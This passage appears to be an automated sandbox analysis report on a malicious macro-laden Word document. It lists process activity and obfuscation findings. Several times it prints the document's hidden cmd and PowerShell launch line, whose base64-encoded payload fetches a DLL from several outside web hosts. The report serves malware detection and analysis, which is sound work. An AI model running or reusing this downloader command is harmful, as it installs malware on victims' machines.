JwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: ??\C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219049704.00000000028F5000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb" source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\B source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdblog source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbrac source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2219201518.0000000002B90000.00000002.00000001.sdmp
Source: Informacion_29.doc Initial sample: OLE summary subject = Industrial, Tools & Health Cliffs Unbranded Soft Tuna Industrial optimal Expanded Cambridgeshire 1080p SMS Money Market Account synthesizing core

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Informacion_29.doc Stream path 'Macros/VBA/Jwq9b1lb0hmm7' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Jwq9b1lb0hmm7 Name: Jwq9b1lb0hmm7
Document contains an embedded VBA with many randomly named variables
Source: Informacion_29.doc Stream path 'Macros/VBA/Jwq9b1lb0hmm7' : High entropy of concatenated variable names
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsA
PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK Jump to behavior
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKw